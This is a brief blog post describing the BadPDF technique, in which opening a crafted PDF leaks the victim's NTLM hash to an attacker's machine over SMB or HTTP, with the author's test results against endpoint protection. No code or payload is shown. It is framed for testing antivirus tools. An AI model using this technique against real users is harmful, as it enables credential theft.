Sunday, May 6, 2018

Stealing NTLM hash with BadPDF - A Technique to bypass AV and Endpoint protections

On April 26, 2018 checkpoint research team discovered the malicious exploit which can be embedded in PDF files to send further to the victims. After opening the malicious PDF file, victim’s machine will leak NTLM hash via SMB protocol.

I created the malicious PDF and tested on my personal machine which was fully equipped with cutting edge end-point protection technology. It leaked NTLM hash to the attacker. If SMB protocol is opened on victim’s machine, it will leak the hash through it.

I thought disabling SMB protocol will patch this issue. So I turned off the SMB protocol on the machine, downloaded the PDF via the web browser and opened it through the Chrome browser only. In that case, the browser made an HTTP request to attacker’s machine for leaking the NTLM hash value.

You can add this to the list of your test cases to evaluate any AV/Anti-malware/end-point protection tool.

Here is the PoC screenshot -

Tool used to create the PDF -
Motivation -

No comments: